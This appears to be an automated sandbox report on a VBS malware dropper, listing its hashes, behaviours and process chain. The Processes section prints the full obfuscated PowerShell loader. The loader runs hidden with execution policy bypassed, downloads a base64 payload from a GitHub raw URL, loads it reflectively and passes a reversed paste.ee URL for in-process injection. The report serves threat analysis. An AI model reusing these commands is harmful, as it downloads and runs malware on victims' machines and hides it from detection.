Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
03/10/2024, 02:14
General
-
Target
de1451645751580908bbbeebecd43a3c0b985bc5f533cd57b9afc31344a6d2e5.vbs
-
Size
491KB
-
MD5
58521e91ead9ed32b1bbb5419e47b485
-
SHA1
f2fc700a67e9fdee9170bb5e6c3ea8f8e2a78bf0
-
SHA256
de1451645751580908bbbeebecd43a3c0b985bc5f533cd57b9afc31344a6d2e5
-
SHA512
3a0e2de34afd2eab5e0f08a12f7ed7676b07730797137130b7a650db81d9b63706a7f308ff063e94f733e73d35e33e920ec13e3d346494fd21e6800b6528175c
-
SSDEEP
12288:jsZA/hgsU9Gd6zSdF1RgQQCdHL9xunBaXr4v2bV/qsC6PlcME6rFUUGY4VgV8X9J:MpKlmMs7LJr
Malware Config
Extracted
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\de1451645751580908bbbeebecd43a3c0b985bc5f533cd57b9afc31344a6d2e5.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9tRVs0XSskcFNoT01lWzM0XSsnWCcpKCAoKCd7Mn11JysncmwgPSB7MX0nKydodCcrJ3RwczovL3Jhdy5naXQnKydodWJ1c2VyYycrJ28nKydudGVudC5jb20vTm8nKydEZScrJ3RlJysnY3RPbi9ObycrJ0QnKydldCcrJ2VjdE8nKyduL3JlJysnZnMnKycvaGVhZCcrJ3MvbWEnKydpbi9EZXQnKydhJysnaE5vdCcrJ2gtVicrJy50eCcrJ3R7MX07IHsnKycyfWJhJysnc2U2NENvbicrJ3RlbnQgJysnPScrJyAoTmV3LScrJ09iJysnaicrJ2VjdCcrJyBTeXN0JysnZScrJ20uTmV0LlcnKydlYkNsaWVudCcrJykuRG8nKyd3bicrJ2xvYWRTdHInKydpbicrJ2coezJ9JysndXInKydsJysnKTsgJysneycrJzJ9JysnYicrJ2luYXJ5Q29udGVudCA9IFtTeXN0ZW0uQ29udmVyJysndCcrJ106OkZyJysnb21CYScrJ3NlNicrJzRTdCcrJ3InKydpJysnbmcnKycoezJ9JysnYmFzJysnZTYnKyc0Q28nKydudGUnKydudCcrJyknKyc7ICcrJ3snKycyfWEnKydzJysnc2UnKydtYmx5ID0gW1JlJysnZmxlJysnY3RpJysnb24uQXNzZScrJ21ibHldOjonKydMbycrJ2FkKHsnKycyfWJpbmFyeUNvbnRlbnQpOyBbZG4nKydsaWIuSU8uJysnSCcrJ29tZV06OlYnKydBJysnSSh7MH0wLycrJ04nKydUUVQnKydKJysnL2QvZWUuZXQnKydzYXAvLzpzJysncHR0aHswfSwgJysnezB9ZGVzYXRpdmFkb3swJysnfScrJywgezB9ZGVzYXRpJysndmFkb3swfScrJywgezAnKyd9ZGUnKydzYXRpdmEnKydkb3snKycwfSwgezB9QWRkSW4nKydQcm9jZXNzMzJ7MH0sIHswfXswfSx7MH17MH0pJykgIC1mW2NIQXJdMzQsW2NIQXJdMzksW2NIQXJdMzYpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOmE[4]+$pShOMe[34]+'X')( (('{2}u'+'rl = {1}'+'ht'+'tps://raw.git'+'hubuserc'+'o'+'ntent.com/No'+'De'+'te'+'ctOn/No'+'D'+'et'+'ectO'+'n/re'+'fs'+'/head'+'s/ma'+'in/Det'+'a'+'hNot'+'h-V'+'.tx'+'t{1}; {'+'2}ba'+'se64Con'+'tent '+'='+' (New-'+'Ob'+'j'+'ect'+' Syst'+'e'+'m.Net.W'+'ebClient'+').Do'+'wn'+'loadStr'+'in'+'g({2}'+'ur'+'l'+'); '+'{'+'2}'+'b'+'inaryContent = [System.Conver'+'t'+']::Fr'+'omBa'+'se6'+'4St'+'r'+'i'+'ng'+'({2}'+'bas'+'e6'+'4Co'+'nte'+'nt'+')'+'; '+'{'+'2}a'+'s'+'se'+'mbly = [Re'+'fle'+'cti'+'on.Asse'+'mbly]::'+'Lo'+'ad({'+'2}binaryContent); [dn'+'lib.IO.'+'H'+'ome]::V'+'A'+'I({0}0/'+'N'+'TQT'+'J'+'/d/ee.et'+'sap//:s'+'ptth{0}, '+'{0}desativado{0'+'}'+', {0}desati'+'vado{0}'+', {0'+'}de'+'sativa'+'do{'+'0}, {0}AddIn'+'Process32{0}, {0}{0},{0}{0})') -f[cHAr]34,[cHAr]39,[cHAr]36))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD57d9820f0c8d4792f9477cddf4ff0fbc2
SHA1e7ef1c5c3938352ad0d4181a94da05d8f56090df
SHA2560b48d790553b6a75e8fd8ec144c775f45484a54643f5f87211471ed93185e75d
SHA512dc76df680f04f945b85601ad6deccc16f16d8a5607f842457f13ecc19932c476c774bac2329ec7a54affe12f651fdf5f578beb2eddce99934014539d06a21bd9
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB